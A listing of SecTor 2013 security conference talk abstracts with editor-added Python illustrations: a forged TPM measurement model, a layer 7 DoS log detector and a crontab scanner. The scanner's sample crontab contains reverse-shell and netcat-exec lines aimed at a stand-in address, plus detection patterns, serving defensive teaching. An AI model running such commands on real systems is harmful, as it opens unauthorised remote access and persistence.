The presentations and videos from the 2013 conference are currently being processed, and will be posted as they become available.
SecTor Management and the Advisory Committee are bringing to Toronto the world's best speakers in the field of IT Security.
SecTor has been built on providing attendees current, real-world knowledge on the latest attacks and defences required to secure your networks. Be sure to receive our SecTor Newsletter updates so you'll know who's coming to SecTor this year and new events to be announced.
How the West was Pwned - G. Mark Hardy
Can you hear it? The giant sucking sound to the East? With it are going more than just manufacturing jobs -- it's our manufacturing know how, intellectual property, military secrets, and just about anything you can think of. If we're one of the most advanced technological nations on Earth, how are the People's Republic of China (PRC) and others able to continue to pull this off? Why do we keep getting pwned at our own game?
There has been much talk about "cyberwar," but there may not be a war. If a victor can extract tribute from the vanquished, war isn't necessary. Today, intellectual capital is a proxy for tribute. We'll look at some specifics, including who is compromising our enterprises and how they're doing it. We'll also look at some of the geopolitics, and see if maybe North America will survive this onslaught after all.
Crossing the line; career building in the IT security industry - Keynote Panel
Ever crossed the line in order to learn your trade in the security world? Or perhaps is there really a line? A recent study suggests that many of us feel that in order to build our careers in the IT security industry, the line might blur to help us learn. A common thread is that in order to fully understand the attacks and build successful defenses, we need to put ourselves in the shoes of the attackers.
There are numerous codes of ethics for IT Security professionals and we have all heard stories about people who have broken them. However, in building our careers we often wrestle with the best and most effective way of doing something versus what the rule book says. Indeed, there are many that disagree with the rule books entirely.
During this talk, our panelists will be addressing many of the issues and concerns as well as share their experiences and perceptions from the point of view of business owners and security professionals alike.
Gene Kim has been studying high-performing IT organizations since 1999. He is the author of the highly acclaimed "Visible Ops Handbook," "The Phoenix Project: A Novel About IT, DevOps, and Helping Your Business Win," and founder of Tripwire, Inc.
He will be presenting his findings from an ongoing study of how high-performing IT organizations simultaneously deliver stellar service levels and deliver fast flow of new features into the production environment. To successfully deliver against what on the surface appear to be conflicting objectives, (i.e. preserving service levels while introducing significant amounts of change into production), requires creating a highly-coordinated collection of teams where Development, QA, IT Operations, as well as Product Management and Information Security genuinely work together to solve business objectives.
Gene will describe what successful transformations look like, and how those transformations were achieved from a software development and service operations perspective. He will draw upon fourteen years of research of high-performing IT organizations, as well as work he's done since 2008 to help some of the largest Internet companies increase feature flow and production stability through applications of DevOps principles.
Tech it out - Marc Saltzman
If you thought today's tech was cool, to quote '70s rockers Bachman-Turner Overdrive, "baby you ain't seen nuthin' yet." This lighthearted yet informative chat focuses on 10 mind-blowing future technologies worth getting excited about. From wearable tech (like Google Glass) and virtual reality (VR) headsets to flying cars and space tourism to domestic robots and the smart home, this video-heavy chat would serve as an entertaining peek into the near future of consumer technology.
Return of the Half Schwartz FAIL Panel w/Tales from beyond the echo chamber
- James Arlen, Dave Lewis, Mike Rothman and Ben Sapiro
The ugly bastard child of FAIL Panel, in its 2nd year running, a discussion on Malware letters received in our mailbag and other general observations on infosec. We'll disagree, agree, talk over each other, ramble until cut-off, throw things and generally entertain you. Vendor and FUD free since we last remembered to wear underwear.
Analyzing Exploit Packs: Tips & Tricks - Mohamad AL-Bustami
In this 30 minute session, we will look at tips and techniques that can help malware analysts and Incident Responders perform effective analysis and de-obfuscate/decode malicious exploit code. Primary focus will be on exploit delivery obfuscation and JAR exploit debugging.
It Takes a Village: Reducing the Threat Gap by Allying with Your Competition - Michael A Barkett
With the maturation of IPS and other threat prevention technologies, security vendors have significantly narrowed the patch gap, but is it enough? The rise in APTs has opened a threat gap that most likely cannot be solved without some collaboration among the good guys – even if they are the competition. Learn how organizations utilize global "neighborhood watch" information, and even share intelligence among their industry peers, to better guard their data.
The Threat Landscape - Ross Barrett and Ryan Poppa
The Rapid7 Labs team vigilantly scans the horizon to discover new tactics being used by attackers as well as widespread vulnerabilities that must be addressed. The team has uncovered a myriad of important issues including significant configuration issues with serial servers, Amazon S3 storage, UPnP and more. The team is consistently tracking and analyzing malware and botnets to help defenders better understand real-world threats. Join us to hear what the Rapid7 team is seeing NOW and what they'll be up to in coming months.
Beyond the Smokers Entrance – Physical Security Assessments in Hardened Environments - Mark Baseggio and Jamie Gamble
This session will discuss conducting physical penetration tests in environments that have some level of security protections. A general framework of social engineering, physical intrusions and practical reviews will be proposed. We will explore how to bypass hard physical security controls, how to conduct comprehensive physical security assessments and how to implement more effective physical defenses.
This talk goes beyond obvious physical security vulnerabilities such as following smokers into a building or asking people to hold doors open for you. In social engineering and physical assessments we often run into environments where significant thought has been put into the security of a site. Explore the common mistakes and bypasses in these implementations and ways to more effectively assess an organization's physical security.
Building a Security Operations Center - Lessons Learned - Yves Beretta
This presentation will go through the various steps required to craft a Security Operations Center; including hiring and managing an array of human resources, monitoring, reporting, and mitigating technology, and covering the definition of repeatable, scalable processes, such as the OODA loop. The presentation will address the fundamental concepts related to training, structuring, and running a 24/7/365 group specialized in threat prevention and mitigation.
This session will highlight how Network Access Control is the ultimate patch checking system. By utilizing a set of key protocols NAC will define and implement a policy that will define the access requirement for devices attempting to access your network. Those policies are designed to look for among other things pre-admission endpoint security policy checks (such as antivirus or even patch levels) and post-admission controls over where users and devices can go on a network and what they can do. Bottom line, we will discuss how NAC might integrate the automatic remediation process (fixing non-compliant nodes before allowing access) into the network systems, allowing the network infrastructure such as routers, switches and firewalls to work together with back office servers and end user computing equipment to ensure the information system is operating securely before interoperability is allowed.
BIOS Chronomancy - John Butterworth
In 2011 the National Institute of Standards and Technology (NIST) released a draft of special publication 800-155. This document provides a more detailed description than the Trusted Platform Module (TPM) PC client specification for content that should be measured in the BIOS to provide an adequate Static Root of Trust for Measurement (SRTM). To justify the importance of 800-155, in this talk we look at the implementation of the SRTM from a vendor's pre-800-155 laptop. We discuss how the BIOS and thus SRTM can be manipulated either due to a configuration that does not enable signed BIOS updates, or via an exploit we discovered that allows for BIOS reflash even in the presence of a signed update requirement.
We also show how a 51 byte patch to the SRTM can cause it to provide a forged measurement to the TPM indicating that the BIOS is pristine. If a TPM Quote is used to query the boot state of the system, this TPM-signed falsification will then serve as the root of misplaced trust. We also show how reflashing the BIOS may not necessarily remove this trust-subverting malware. To fix the un-trustworthy SRTM we apply an academic technique whereby the BIOS software indicates its integrity through a timing side-channel.
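The abstract above turns on one property of the TPM: a quote signs whatever values were extended into the PCRs, not the code that was actually executed. The added example below (editor's illustration, not material from the talk or from any vendor firmware) models PCR0 as a TPM 1.2 SHA-1 extend chain and contrasts an honest SRTM, which hashes the BIOS image it finds, with a patched SRTM that extends a hard-coded known-good digest regardless of what is in flash. The BIOS images, the later boot measurements and the attester's golden value are all constructed stand-ins; the TPM's signature over the quote is omitted because it adds nothing to the point, which is that the signed value is the forged one.

```python
import hashlib
from typing import Iterable

PCR_SIZE = 20  # TPM 1.2 PCRs hold a SHA-1 digest


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def extend(pcr: bytes, measurement: bytes) -> bytes:
    """TPM PCR extend: PCR_new = SHA1(PCR_old || measurement). Order of extends matters."""
    assert len(pcr) == PCR_SIZE and len(measurement) == PCR_SIZE
    return sha1(pcr + measurement)


def replay(measurements: Iterable[bytes]) -> bytes:
    """Recompute a PCR from an ordered measurement list, starting from the reset value (all zeros)."""
    pcr = bytes(PCR_SIZE)
    for m in measurements:
        pcr = extend(pcr, m)
    return pcr


# Constructed stand-ins: a pristine firmware image and the same image after an attacker's reflash.
GOLDEN_BIOS = b"vendor BIOS image v1.0"
IMPLANTED_BIOS = b"vendor BIOS image v1.0 + implant"

# Constructed later measurements that follow the BIOS into PCR0 (option ROMs, MBR, ...).
REST_OF_BOOT = [sha1(b"option ROMs"), sha1(b"MBR")]


def expected_pcr0() -> bytes:
    """The remote attester's golden value: what PCR0 holds when the BIOS is pristine."""
    return replay([sha1(GOLDEN_BIOS)] + REST_OF_BOOT)


def honest_srtm_quote(bios_in_flash: bytes) -> bytes:
    """An honest SRTM measures the code actually present in flash and extends that digest."""
    return replay([sha1(bios_in_flash)] + REST_OF_BOOT)


def patched_srtm_quote(bios_in_flash: bytes) -> bytes:
    """A patched SRTM ignores flash contents and extends the digest the attester expects.
    The TPM cannot tell the difference: it signs the PCR it was given."""
    del bios_in_flash  # deliberately unused: this is the forged measurement
    return replay([sha1(GOLDEN_BIOS)] + REST_OF_BOOT)


def attester_accepts(quoted_pcr0: bytes) -> bool:
    """Remote attestation check: does the quoted PCR0 match the golden value?"""
    return quoted_pcr0 == expected_pcr0()
```

With an honest SRTM the implanted image changes PCR0 and the quote is rejected; with the patched SRTM the same implanted image produces the golden PCR0 and the quote is accepted. Nothing in the quote distinguishes the two cases, which is why the talk proposes checking the measuring code itself by another channel (timing) rather than trusting its reported value.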
Reacting to Cyber Crime: Preserving Crucial Evidence for Law Enforcement - Cpl. David Connors and Sgt. Stéphane Turgeon
Evidence handling is of primary importance for the RCMP Tech Crime Unit Members when called upon to investigate a possible cybercrime. When such an incident occurs, it is important that the IT personnel in place are in a position to clearly identify the potential digital-related evidence and to properly preserve it upon the arrival of the RCMP High Tech Crime Members. This presentation will cover the necessary actions that IT personnel are required to perform under those circumstances as well as the processes to respect when reporting an incident to their RCMP High Tech Crime Unit.
As Virtual Machines (VM's) were the disruptive technology at the end of last century for server and storage platforms, Software Defined Networks (SDN) will be (already is) the first industry-changing, disruptive technology for switch and router platforms in this young century. SDN has already gained grass roots momentum as early adopters Google, Goldman Sachs and Fidelity have announced that they have deployed SDN on their enterprise networks (over a year ago). As this disruptive technology grows and scales, it should be no surprise that cyber security will become the killer app for this new platform.
Join us as we share strategy and tactics on how customers who are upgrading to SDN networks can integrate next generation Advanced Cyber Security protection in their networks and avoid having to retrofit it afterwards, like we did in the last century.
A CSEC cybersecurity analyst has gone rogue. He has taken a large cache of top secret files that include the names and identities of several secret agents working in foreign countries. This rogue analyst has stowed these files on the internet in an encrypted format and he is now threatening to share the location of the files and the decryption keys with the public. Earlier today, the CSEC cybersecurity analyst narrowly avoided capture at a local cyber cafe, but during his escape, he left behind a USB drive, which contained our only clues thus far...
Does this scenario sound familiar? Would you know how to recover this data?
In this action packed hour, Todd will use various publicly available infosec tools to solve this fictitious infosec mission. Topics and tools will include cryptography, steganography, virtual machines, network and intrusion monitoring and vulnerability exploit tools.
Malware Automation - Christopher Elisan
Automation is key when it comes to production. The same is true for malware. Malware production has moved on from the traditional manual method to a more efficient automated assembly line. In this talk, I will take the audience on an over-the-shoulder look at how attackers automate malware production. Discussion will focus on the tools and methodologies the attackers use to produce thousands of malware on a daily basis. The talk will then conclude with a live demonstration of how malware is produced in an automated fashion.
Big Data Security, Securing the insecurable - Kevvie Fowler
Big data is one of the fastest growing areas within IT. The benefits of big data have been well publicised however little is known about the actual security risks associated with the technology.
This session cuts through the hype and will expose big data security risks, a new class of attack and the practical guidance needed to secure this critical technology.
Many Security Analysts are tasked with assisting in Corporate Governance. This session explores the concept of network forensic investigations using a SIEM, and how security analysts can use it to assist in Governance, HR or law enforcement with network interception to gather evidence that must preserve chain-of-custody. With the challenges of cloud-based computing and mobile devices, the need for well-defined workflow and the use of industry-accepted tools is even more essential than ever. Get familiar with Using integration Commands on-demand to gather external data for an investigation.
How to Connect Security to the Business - Jeanne Glass
When CISOs are briefing their executive teams or boards on the organization's security (usually only when there's a security incident), this is usually the challenge. Distill the volumes of data, assets, silos, operations, threats, and remediations down to a couple of key points. And this is to an audience who typically get their security information from their mobile newsfeed or WSJ. No wonder the average tenure is about 18 months for most CISOs.
How to "Connect Security to the Business" (CSTB), describes the issues and suggests some meaningful ways CISOs, CIOs, and their IT Security teams can effectively communicate security metrics to the business or mission leadership.
RATastrophe: Monitoring a Malware Menagerie - Seth Hardy and Katie Kleemola
Over the last three years, our visibility into the threat landscape of civil society organizations and human rights NGOs has led to a number of discoveries about how various threat actors are engaging in espionage against civilian targets. Attacks in this area are often overlooked by AV and security companies due to the low resources available to civil society for expensive security solutions by big-name vendors.
In this talk, we will describe a few malware families that are actively being developed and used for the purpose of monitoring human rights activists and NGO workers. More importantly, we will cover in detail the ways that the individual threats were found, how they are strongly interconnected, and how they can likely be attributed to a single actor. We will also describe how we do this research as a small group and how civil society groups can protect themselves from threats with minimal resources.
Watching the watchers: hacking wireless IP security cameras - Artem Harutyunyan and Sergey Shekyan
Low cost commodity IP surveillance cameras are becoming increasingly popular among households and small businesses. As of April 2013 Shodan (www.shodanhq.com) shows close to 100000 cameras active all over the world. Despite the fact that there are many models by different vendors, most of them are actually based on identical hardware and firmware. Moreover, there are even other devices (such as Internet TV boxes) that use similar firmware.
Interestingly enough, those cameras have little or no emphasis on security. In particular, the web based administration interfaces can be considered a textbook example of an insecure web application. This easily leads to an exposure of not only sensitive personal information (such as wireless network, FTP, and even email access credentials), but also provides an eye inside the victim's house. It can also be used to replace the video stream with an external stream or a still picture.
Our contribution will cover how those cameras work, as well as how to gain control over a camera in the wild. Furthermore, we will present analysis of security malpractices that make it possible to harvest sensitive data stored on the camera, as well as to use a camera as an attack platform inside the victim's private network. The presentation will conclude with the introduction of a toolkit for extracting, altering and repackaging original components of the camera, as well as a live demo during which we will show how a camera (that was set up following the vendors' recommendations and tutorials) can be compromised. Last but not least we will share recommendations on how the setup of the camera can be made less insecure.
New application architectures, programmatic languages and frameworks, the (un)availability of exposed platform security capabilities combined with virtual/physical networking and workload mobility are beginning to stress our "best practices" from a security perspective. What are the real security issues (or hype) of Software Defined Networking (SDN) and the vision of the Software Defined Datacenter?
Threat Modeling 101 - Leigh Honeywell
Threat modeling allows developers and security professionals to collaborate and catch vulns before they ship – and potentially before the code is even written. In this hands-on workshop, Leigh will teach the basics of threat modeling using a game called Elevation of Privilege.
Running at 99%, mitigating a layer 7 DoS - Ryan Huber
Application-Level Denial of Service (DoS) attacks are a threat to nearly everyone hosting content on the Internet. DoS attacks are simple to launch, but are often very difficult to defend against. Modern websites are a diverse set of moving parts, and a malicious actor only needs to find the point at which any one of these systems is overwhelmed to bring your website to a halt.
Organizations may approach this problem by increasing capacity, perhaps leveraging the cloud to expand horizontally. This can be a successful short term mitigation strategy, but a combined historic and real-time view of who is accessing your website (and why) gives you the chance to actively defend as opposed to simply absorbing the traffic. Trending this data over time allows your response time to decrease while keeping your front door open. In this talk I will present a new open source project, written primarily in Node.js, that can be used as a defense framework for mitigating these attacks.
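The defence the abstract describes is a view of who is hitting the site and how that compares with normal behaviour, rather than raw capacity. The added example below is an editor's illustration, not code from the speaker's Node.js project: it parses access-log lines in common log format, computes each client's peak request count inside a sliding window, uses the median per-client peak as a stand-in for the "historic" baseline, and flags clients whose peak is far above that baseline and whose requests are concentrated on a single path, the signature of a layer 7 flood aimed at one expensive endpoint. The log lines, addresses and thresholds are constructed for the example; in production the baseline should come from stored history rather than the same batch being scored, since a flood large enough to dominate the batch would drag the median up with it.

```python
import re
import statistics
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional, Tuple

# Common log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line; return None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "path": m["path"].split("?", 1)[0],  # group by endpoint, ignoring query strings
        "status": int(m["status"]),
    }


def build_sample_log() -> List[str]:
    """Constructed traffic: four ordinary visitors plus one client hammering /search."""
    t0 = datetime(2013, 10, 8, 9, 0, 0, tzinfo=timezone.utc)
    lines: List[str] = []

    def add(ip: str, offset_s: int, path: str, status: int = 200) -> None:
        ts = (t0 + timedelta(seconds=offset_s)).strftime(TS_FMT)
        lines.append(f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 512')

    for i, ip in enumerate(["203.0.113.10", "203.0.113.11", "203.0.113.12", "203.0.113.13"]):
        for j, path in enumerate(["/", "/static/app.js", "/products/7"]):
            add(ip, i * 5 + j * 2, path)
    for k in range(30):  # 30 searches from one address inside a single minute
        add("198.51.100.7", k * 2, f"/search?q=term{k}")
    return lines


def find_abusers(
    lines: List[str],
    window: timedelta = timedelta(seconds=60),
    baseline_multiplier: float = 5.0,
    concentration: float = 0.8,
) -> List[Tuple[str, int, str]]:
    """Return (ip, peak_requests_in_window, top_path) for clients that are both far above the
    per-client baseline and concentrated on one endpoint."""
    events = [e for e in map(parse_line, lines) if e]
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    peaks: Dict[str, int] = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = 0, 0
        for end in range(len(evs)):  # sliding window over the sorted timestamps
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            best = max(best, end - start + 1)
        peaks[ip] = best

    if not peaks:
        return []
    baseline = statistics.median(peaks.values())  # stand-in for a stored historic baseline

    flagged: List[Tuple[str, int, str]] = []
    for ip, peak in peaks.items():
        paths = Counter(e["path"] for e in by_ip[ip])
        top_path, top_n = paths.most_common(1)[0]
        if peak > baseline * baseline_multiplier and top_n / len(by_ip[ip]) >= concentration:
            flagged.append((ip, peak, top_path))
    return flagged
```

On the constructed sample the four browsers peak at 3 requests per minute, the median baseline is 3, and the one client with 30 requests to /search is the only entry returned; a client that is merely busy but spread across many paths would pass the concentration test and not be flagged.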
MILLION BROWSER BOTNET - Matt Johansen
Information & Risk Mitigation - Neils Johnson
Information is the lifeblood of today's connected world. It plays a critical role in our personal lives and drives our businesses. Each year, the amount of information we create – from digital photos to business critical data – increases exponentially. Securing and managing our information, and the identities to access that information, becomes even more important and challenging. This session will demonstrate Symantec's definition of Risk and address the tension between Security and Availability in an organization. To mitigate that risk, Symantec's vision and focus will be in three areas: User Productivity and Protection, Information Security, and Information Management.
Two ongoing industry trends are in conflict with each other. On the one hand, networks are increasingly being consolidated into shared infrastructure utilized by many different clients. From converged hardware networks, through virtualized IT shops, into the cloud, more and more traffic is being merged and intermixed on this shared infrastructure. Conversely, industry regulatory and compliance bodies require that sensitive data, whether it is personally identifiable, financial, or otherwise private, must be segregated and protected with rigorous cryptographic controls. Addressing both of these concerns within the same shared infrastructure is challenging. This talk presents a novel approach for segregating and securing sensitive data on a need-to-know basis, while it is in motion through shared networks, without changing existing network hardware, across any network topology, using industry standard protocols.
Appsec Tl;dr - Gillis Jones
Have you ever wondered what it takes to get one of those "Elusive" bug bounties that people are always snapping up? In this presentation, Gillis Jones will walk you through the fundamentals of the web, and on to the art of hacking the planet. Complete with examples, secrets that the professionals try and keep quiet, and suggestions on "How to Hack"- this presentation aims to bring you to a level of proficiency in hacking the web in less than 60 minutes.
Breaking in is half the battle. I've talked to so many people whose only objective is to try and break into systems. I get that. It's awesome, the rush you get when you bring up that shell. But what then? Ops hardening does not end at the outer shell. Once you're in, you still have to navigate the maze of files, directories, and permissions that is the Linux file system. This talk will cover discovering services, utilizing simple and moderate netcat commands, combining netcat with crontab to create access windows, utilizing /dev/tcp to create a reverse shell, obfuscation to avoid IDS/IPS, and providing examples of tools at each step of the way. Some Linux experience needed. If breaking in is half the battle, staying in wins the war.
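The cron and /dev/tcp tricks in the abstract above are exactly what a defender should be looking for once an attacker is past the outer shell. The added example below is an editor's illustration of the detection side, not code from the talk: it scans crontab text for commands that contain the indicators named in the abstract (bash /dev/tcp redirections, netcat with -e, interactive shells with redirected descriptors, decode-then-execute and download-then-execute pipelines, mkfifo relays) and reports the schedule line that creates each access window. The crontab content, the address and the indicator list are constructed for the example and would need tuning for a real environment.

```python
import re
from typing import List, Tuple

# Constructed indicator list covering the techniques named in the abstract. Order matters:
# the first pattern that matches a command is the one reported.
SUSPICIOUS = [
    ("dev_tcp_redirect", re.compile(r"/dev/(tcp|udp)/")),
    ("netcat_exec", re.compile(r"\b(nc|ncat|netcat)\b[^#\n]*\s-(e|c)\s")),
    ("interactive_shell_redirect", re.compile(r"\b(ba)?sh\s+-i\b[^#\n]*[>&]")),
    ("decode_then_exec", re.compile(r"base64\s+(-d|--decode)[^#\n]*\|\s*(ba)?sh\b")),
    ("download_then_exec", re.compile(r"\b(curl|wget)\b[^#\n]*\|\s*(ba)?sh\b")),
    ("mkfifo_shell", re.compile(r"\bmkfifo\b")),
]

# Five schedule fields followed by the command; @reboot-style aliases are handled separately.
CRON_RE = re.compile(r"^(?P<min>\S+)\s+(?P<hour>\S+)\s+(?P<dom>\S+)\s+(?P<mon>\S+)\s+(?P<dow>\S+)\s+(?P<cmd>.+)$")

# Constructed crontab: one legitimate backup job and three entries an attacker might plant.
SAMPLE_CRONTAB = "\n".join([
    "# m h dom mon dow command",
    "PATH=/usr/local/bin:/usr/bin:/bin",
    "0 2 * * * /usr/local/bin/backup.sh >/var/log/backup.log 2>&1",
    "*/15 * * * * /bin/bash -c 'bash -i >& /dev/tcp/198.51.100.7/4444 0>&1'",
    "30 4 * * 1 nc -l -p 8080 -e /bin/sh",
    "@reboot echo YmFzaCAtaQ== | base64 -d | sh",
])


def split_entry(line: str) -> Tuple[str, str]:
    """Return (schedule, command) for a cron entry, or ('', '') if it is not one."""
    if line.startswith("@"):  # @reboot, @hourly, ... followed by the command
        parts = line.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else ("", "")
    m = CRON_RE.match(line)
    if not m:
        return ("", "")
    schedule = " ".join(m[g] for g in ("min", "hour", "dom", "mon", "dow"))
    return (schedule, m["cmd"])


def scan_crontab(text: str) -> List[Tuple[int, str, str, str]]:
    """Return (line_no, indicator, schedule, command) for entries matching an indicator."""
    hits: List[Tuple[int, str, str, str]] = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:  # VAR=value environment lines are not jobs
            continue
        schedule, cmd = split_entry(line)
        if not cmd:
            continue
        for name, rx in SUSPICIOUS:
            if rx.search(cmd):
                hits.append((n, name, schedule, cmd))
                break
    return hits
```

Run against a host's /etc/crontab, /etc/cron.d/* and each user's spool (crontab -l -u USER) the same function gives a quick sweep for scheduled reverse shells; the schedule field tells you when the access window opens, which is also the moment to watch for the outbound connection on the network side.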
Trust No One: The New Security Model for Web APIs - Greg Kliewer
There are many great things about the new world of mobile and cloud applications. They enable us to be more connected and productive in our daily lives, whether it be tracking our exercise with a mobile app, banking on our phones, or seamlessly accessing the same data - whether it be for business or personal reasons - across all of our devices. But for those of us who are tasked with enabling these new experiences for consumers of our organizations' existing services and assets, access from these new platforms presents a myriad of new complications. At the top of the list for most enterprises is how to secure access from mobile and cloud applications. In his talk, Greg will introduce the emerging standards for API access control, and provide a few ideas about how to get started providing APIs in a secure way.
Exploiting the Zero'th Hour: Developing your Advanced Persistent Threat to Pwn the Network - Solomon Sonya and Nick Kulesza
Advanced Persistent Threats (APT) and Botnets represent one of the largest security concerns with regards to network defense and exploitation. Most security professionals know about these advanced tools; many people have even discussed the overall concept regarding command and control of networked systems, however, many experts do not yet understand how to create a botnet and establish unhindered command and control to many systems across the Internet. If a security researcher or penetration tester sets out to build a botnet, where do they begin and how do they overcome serious difficulties encountered in the development of their botnet and APT malware? This talk solves these issues by showing exactly how to create a botnet (from scratch), how to build new implants and the master controller to herd all infected systems into one user interface, and includes live demos of Splinter, the Remote Administration Tool (RAT) we created to demonstrate the entire process and release to the community for use. And so what about defense you ask? One word answers this: PWNED!!! As systems continue to be exploited on a daily basis, the end result of this presentation is to show how to build these botnets such that white-hat hackers, penetration testers, red team experts, and computer incident responders can tie this knowledge into implementing better security measures for the protection of our networks.
Swiping Cards At The Source: POS & Cash Machine Security - Ryan Linn and John Hoopes
You put your credit card in, I take your cash out. Point of Sale systems and Cash Machines are frequently targeted but rarely discussed. This talk will be a frank discussion about the types of attacks Ryan and John have both seen and executed against these types of machines, where these systems are vulnerable from physical attacks to network and trojan attacks, and how to proactively deal with the problems.
Ryan and John will focus on current, practical, and frequently seen attacks of both POS systems and systems which dispense cash, because THAT'S what it's all about.
This talk will cover the current state of the art in .NET reversing, down from PE format of .NET assemblies through various types of obfuscation, and into reversing tools and techniques. Finally, we will explore reversing popular .NET RE tools in an attempt to modify their behavior.
CeilingCat IS Watching You - Shane MacDougall
It shouldn't be news to anyone that people share too much information online. In fact, one major problem that attackers and defenders have is the sheer volume of data that they need to sort through. In this presentation, Shane MacDougall will demonstrate leaked information that can lead to a successful attack, walk through a couple of public profiles in a deep dive of social media presences, and then do a demo of his new OSINT gathering tool, CeilingCat (C2), which can perform wide-scale enumeration of targets, building up sensitive profiles of targets over time.
The benefits of CVE, CWE, MAEC, CWSS, CAPEC, STIX and TAXII can often be at work without the users knowledge. Learn how these standards are working behind the scenes, and how you can use them to support information sharing and gain an advantage from crowd-sourced security information. Prior to 1999, software vulnerabilities were not widely discussed, tracked, correlated, or patched. The Common Vulnerabilities and Exposures list (CVE) was the first to unify such information and provided a key component to being able to talk about software vulnerabilities generically. CVE enjoys broad adoption today, and has achieved de facto standard status. The U.S. Department of Homeland Security (DHS) continues to promote development of additional resources; although these related efforts are less widely known, they can play a role in your security product, service, or benefit as an end-user. This talk will provide an overview of how these standards interact in daily security operations, and show demonstrations of automated security information sharing using these standards.
Build Your Own Android Spy-Phone - Kevin McNamee
Know your enemy! Attendees will see a live demonstration of how we built a proof-of-concept Android Spy-Phone. We will show how we developed the Android spy-phone module and demonstrate how to inject it into legitimate applications to infect unsuspecting victims. We will demonstrate how the spy-phone command and control server can take complete control of the infected phone to steal information, track its location, track SMS and telephone messages, send SMS messages from the phone, and take photos and eavesdrop on conversations without the user knowing. In the BYOD/APT context these capabilities provide a formidable cyber-espionage platform.
Weaponized Security - Kellman Meghu
How dangerous can you get with just the security tools you have today? Do you have access to a technology that makes searching patterns of data in the network very simple? I bet you do. Now I want you to imagine implementing that technology on an open wifi to investigate and monitor, not protect. This talk discusses how a tool to secure people can be turned against them, and the results of random people, leaking data about their computers, and themselves. This is all done with publicly available and commonly implemented enterprise security, just implemented in uncommon ways. PLEASE NOTE: This presentation contains content from a free wifi connection that the users did agree to full release of information in exchange for service, in so much as they clicked accept on a captive portal to get online. You can't say we didn't try to warn them. The data extracted from this network in no way reflects the thoughts, feeling or attitudes of the presenter, and some of it may be offensive in nature. Who knows, maybe you are even in this presentation yourself, have you ever used 'free' wifi?
Data in the Cloud. Who owns it and how can you get it back? - Dave Millier
With the rush to take advantage of all "the Cloud" has to offer, many companies are struggling with the new reality that their data is being sent outside the confines of the corporate environment and being stored in multiple geographic locations. With the Cloud comes the challenge of securing your data, understanding where it is at all times, and maintaining the same levels of role-based access to data and data retention policies. To further complicate things, a more fundamental question arises: who owns the data once it leaves your corporate network, and in the event of a data loss, how do you get it back? This talk will delve into some of these issues, talk about developing and enforcing policies to help maintain control of your data, and talk about some of the challenges in managing your data once it's out there. We will also present research from a study we conducted with 7 service providers specifically focused on Incident Response in the Cloud, where we set up accounts with the providers, set up identical data stores, simulated a breach which resulted in data being deleted and in some cases modified, and then queried each provider to find out what information they had on what was changed, what information they had on who made the changes, and just as importantly determined whether they were able to assist us in restoring the data to its original state.
In today's increasingly open and interconnected enterprise, traditional perimeters are quickly being extended to multi-perimeters to support secure adoption of mobile, cloud, social and information interactions. The traditional network, IT, and end-point security capabilities are being enhanced to support these interactions and similar demands are put on the Identity and Access Management systems too.
In this session, IBM will share the changing security landscape from rapid adoption of mobile, cloud, social and information transformation and the resulting needs to extend traditional Identity and Access Management for the future. This session will also cover an Identity and Access Management maturity model to help organizations and agencies evaluate and address the emerging security and market needs.
Frayed Edges; Monitoring a perimeter that no longer exists - Mark Nunnikhoven
The foundations of traditional network security are crumbling in the public cloud. Old assumptions will leave your cloud deployments vulnerable and exposed. In this talk, we'll examine the existing models of network security and how you can transition to new cloud-friendly models that take advantage of dynamic cloud environments. With the stage set, we'll dive into the details of how to piggyback on cloud deployment and monitoring tools to increase visibility into your cloud deployment to provide you with the awareness you need.
Vulnerability Management program managers often miss the mark by focusing on the wrong information, communicating poorly, and not understanding how business criticality relates to the technical risk found in scanning. This creates a "bad data" scenario in which all the data collected is seen to have little or no value, which increases both risk and frustration.
This presentation is about lessons learned by studying what goes wrong in the real world with Vulnerability Management programs. More importantly, it discusses how you can build a program that focuses on threat management, security intelligence, risk awareness and patch auditing.
Securing Enterprise Mobility beyond MDM - Danny Pehar and Ali Afshari
Enterprise Mobility offers great challenges and great opportunities. A plethora of technologies, many of them overlapping, are constantly entering and evolving in the market to address the security and manageability of enterprise mobility (including BYOD). This discussion will focus on demystifying that landscape and on providing perspectives on leveraging Secure Enterprise Access Control as a core technology layer: a central clearing house that sets and enforces security policies and manages compliance for all devices, whether they are WWAN, WLAN or LAN based. We will specifically discuss the integration points and the technologies they interact with to provide a cohesive, unified way of securing and managing compliance at a contextual level in this rapidly evolving landscape.
The World's Deadliest Malware - Christopher Pogue
This silent threat infects more than 1,000 victims annually. It shows no prejudice, it has no compassion. It comes like an unseen thief in the night to steal. It IS the World's Deadliest Malware.
Point of Sale breaches continue to plague the business world. Credit card data is being stolen in ever increasing numbers with no signs of slowing down. How do these breaches occur? How are targets selected? How does the malware get deployed? What does it do once it gets there? Why does Anti-Virus not catch it? Who is performing these breaches? Why? Does it really have that much of an impact on the business world?
Hear the answers to all of these questions, and much more, straight from the field from Trustwave SpiderLabs Director of Incident Response and Digital Forensics, Chris Pogue. Hear how these investigations are conducted, what cutting-edge tools and techniques are being used to identify this criminal activity, and actually see the malware at work first hand! (Yes... there is a Demo.)
The Bad Boys of Cybercrime - Christopher Pogue
These silent attackers hit more than 1,000 victims annually. They show no prejudice and have no compassion. They come like an unseen thief in the night to steal. They are the Bad Boys of Cyber Crime.
